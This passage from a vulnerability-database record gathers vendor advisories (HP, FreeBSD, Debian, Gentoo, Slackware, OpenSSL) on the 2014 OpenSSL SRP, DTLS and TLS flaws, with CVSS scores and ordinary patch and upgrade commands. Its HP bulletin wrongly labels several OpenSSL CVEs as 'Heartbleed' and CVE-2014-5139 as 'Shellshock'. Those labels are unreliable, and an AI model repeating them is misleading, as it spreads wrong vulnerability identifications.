"https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0387" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b31-1.13.3-1ubuntu1~0.10.04.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b31-1.13.3-1ubuntu1~0.12.04.2" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.debian.org/security/" } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126443" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2014-04-16T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2014-04-15T00:00:00", "db": "BID", "id": "66914" }, { "date": "2014-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2014-05-14T15:09:44", "db": "PACKETSTORM", "id": "126611" }, { "date": "2014-04-17T22:02:41", "db": "PACKETSTORM", "id": "126200" }, { "date": "2015-02-16T17:24:02", "db": "PACKETSTORM", "id": "130400" }, { "date": "2014-07-29T22:17:21", "db": "PACKETSTORM", "id": "127655" }, { "date": "2014-05-02T06:40:40", "db": "PACKETSTORM", "id": "126443" }, { "date": "2014-08-20T15:19:26", "db": "PACKETSTORM", "id": "127938" }, { "date": "2014-04-25T17:49:43", "db": "PACKETSTORM", "id": "126320" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2014-04-16T01:55:09.713000", "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2020-09-08T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2015-04-13T21:28:00", "db": "BID", "id": "66914" }, { "date": "2015-12-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2020-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2022-05-13T14:57:20.947000", "db": "NVD", "id": "CVE-2014-0453" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127938" }, { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Oracle Java In product Security Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002089" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-268" } ], "trust": 0.6 } }
var-201408-0082
Vulnerability from variot
Multiple buffer overflows in crypto/srp/srp_lib.c in the SRP implementation in OpenSSL 1.0.1 before 1.0.1i allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via an invalid SRP (1) g, (2) A, or (3) B parameter. OpenSSL is prone to a denial-of-service vulnerability. Attackers may exploit this issue to overrun an internal buffer, resulting in a denial-of-service condition. OpenSSL 1.0.1 versions prior to 1.0.1i are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04595951
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04595951 Version: 1
HPSBHF03293 rev.1 - HP Virtual Connect 8Gb 24-Port FC Module running OpenSSL and Bash, Remote Denial of Service (DoS), Code Execution, Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-03-13 Last Updated: 2015-03-13
Potential Security Impact: Remote Denial of Service (DoS), code execution, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Virtual Connect 8Gb 24-Port FC Module running OpenSSL and Bash including:
- The OpenSSL vulnerability known as "Heartbleed" which could be exploited remotely resulting in Denial of Service (DoS) or disclosure of information.
- The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "Poodle", which could be exploited remotely resulting in disclosure of information.
- The Bash Shell vulnerability known as "Shellshock" which could be exploited remotely resulting in Denial of Service (DoS) or execution of code.
References: CVE-2009-3555 Unauthorized Modification
CVE-2014-0160 Heartbleed - Disclosure of Information
CVE-2014-0195 Remote Code Execution, Denial of Service (DoS)
CVE-2014-3505 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3506 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3507 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3508 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3509 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3510 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3511 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3512 Heartbleed - Remote Denial of Service (DoS)
CVE-2014-3566 POODLE - Remote Disclosure of Information
CVE-2014-5139 Shellshock - Remote Denial of Service (DoS)
SSRT101846
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Virtual Connect 8Gb 24-Port FC Module prior to version 3.00 (VC 4.40)
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2009-3555 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8 CVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-3512 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has released the following software update to resolve the vulnerabilities in HP Virtual Connect 8Gb 24-Port FC Module
HP Virtual Connect 8Gb 24-Port FC Module version 3.00 (VC 4.40)
HISTORY Version:1 (rev.1) - 13 March 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-14:18.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2014-09-09 Affects: All supported versions of FreeBSD. Corrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE) 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8) 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE) 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1) 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11) 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18) 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE) 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15) CVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510, CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. [CVE-2014-5139]
III. Impact
A remote attacker may be able to cause a denial of service (application crash, large memory consumption), obtain additional information, cause protocol downgrade. Additionally, a remote attacker may be able to run arbitrary code on a vulnerable system if the application has been set up for SRP.
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 10.0]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 9.3]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 9.2, 9.1, 8.4]
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch
fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc
gpg --verify openssl-9.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
3) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r269687 releng/8.4/ r271305 stable/9/ r269687 releng/9.1/ r271305 releng/9.2/ r271305 releng/9.3/ r271305 stable/10/ r269686 releng/10.0/ r271304
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBCgAGBQJUDtUBAAoJEO1n7NZdz2rnOUoP/jNoEEPVt1RoVPQoOQc6vno5 2HXcCDsu0ql3kCNIIZ7E6TddfduzV04EMzBrIgulg7eXft+Lnx6HlEgJOo7QLImc aWLWxjcbyby6wrbYOc+FLK11yx9/uZJF0VCdSeyzhy0EFD3tOZPsDMXKZmG7FRkg 6A7ENJU25Mx8V1myzHw/VfDwAHCtXHliFVVE0CUku55pYnlhMeetu/wuB6KYbmgV 1WUamiHEGl4Dh4Up7nGHYYm32kqZLaE+cf1Ovc2VGT98ZyXmCgDB4+8kkA/HZxxp DRgQlojeQhahee5MmzD+wMJXlq6dekoo+JVf22+Nb+oNmlKT6/UxtUhCwW11MLUV rnOMr3u1JCNvBc+3KroSmtFeEtqh7jx3Ag4w8lS5mJO+wX1/lilbsFxSS/9G65fy LqHUQSxkuDJ1bNzPfKreBPyUmQlG5t/3DonIDCF9r3sefDN+kxqe1+RwjdNRM0ov V7OH/AW1NBQtV/F/h0tKCcskvcJo9Q+inAohheLPnWkFj7F2tLNt5TAxsGy7WvFZ MuQSAXpZkdh7OkhAhBM3Xk+EOv7Qk7zZL5HJ1Lpm6kfJ8wSb4etoUV7oELaDMBz8 +9r+Vr9GtjSsec2a4tjNIixZKV9bzEhgKP5gsWD/JewhAzF+0bYNa9snOWxzpAYb j+eW9IT7pEAJK9DtIsDd =f4To -----END PGP SIGNATURE----- .
All applications linked to openssl need to be restarted. Alternatively, you may reboot your system.
For the stable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u12.
For the testing distribution (jessie), these problems will be fixed soon.
For the unstable distribution (sid), these problems have been fixed in version 1.0.1i-1. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-39
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 26, 2014 Bugs: #494816, #519264, #525468 ID: 201412-39
Synopsis
Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in Denial of Service or Man-in-the-Middle attacks.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.1j *>= 0.9.8z_p2 >= 1.0.1j
Description
Multiple vulnerabilities have been discovered in OpenSSL. Please review the CVE identifiers referenced below for details.
Resolution
All OpenSSL 1.0.1 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1j"
All OpenSSL 0.9.8 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8z_p2"
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying these packages.
References
[ 1 ] CVE-2013-6449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449 [ 2 ] CVE-2013-6450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450 [ 3 ] CVE-2014-3505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505 [ 4 ] CVE-2014-3506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506 [ 5 ] CVE-2014-3507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507 [ 6 ] CVE-2014-3509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509 [ 7 ] CVE-2014-3510 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510 [ 8 ] CVE-2014-3511 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511 [ 9 ] CVE-2014-3512 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512 [ 10 ] CVE-2014-3513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513 [ 11 ] CVE-2014-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567 [ 12 ] CVE-2014-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568 [ 13 ] CVE-2014-5139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-39.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
OpenSSL 0.9.8 users should upgrade to 0.9.8zb OpenSSL 1.0.0 users should upgrade to 1.0.0n. OpenSSL 1.0.1 users should upgrade to 1.0.1i.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team.
Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)
The issue affects OpenSSL clients and allows a malicious server to crash the client with a null pointer dereference (read) by specifying an SRP ciphersuite even though it was not properly negotiated with the client. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
If a multithreaded client connects to a malicious server using a resumed session and the server sends an ec point format extension it could write up to 255 bytes to freed memory.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory exhaustion (CVE-2014-3506)
An attacker can force openssl to consume large amounts of memory whilst processing DTLS handshake messages. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory leak from zero-length fragments (CVE-2014-3507)
By sending carefully crafted DTLS packets an attacker could cause openssl to leak memory. This can be exploited through a Denial of Service attack.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1i.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL TLS protocol downgrade attack (CVE-2014-3511)
A flaw in the OpenSSL SSL/TLS server code causes the server to negotiate TLS 1.0 instead of higher protocol versions when the ClientHello message is badly fragmented. This allows a man-in-the-middle attacker to force a downgrade to TLS 1.0 even if both the server and the client support a higher protocol version, by modifying the client's TLS records.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
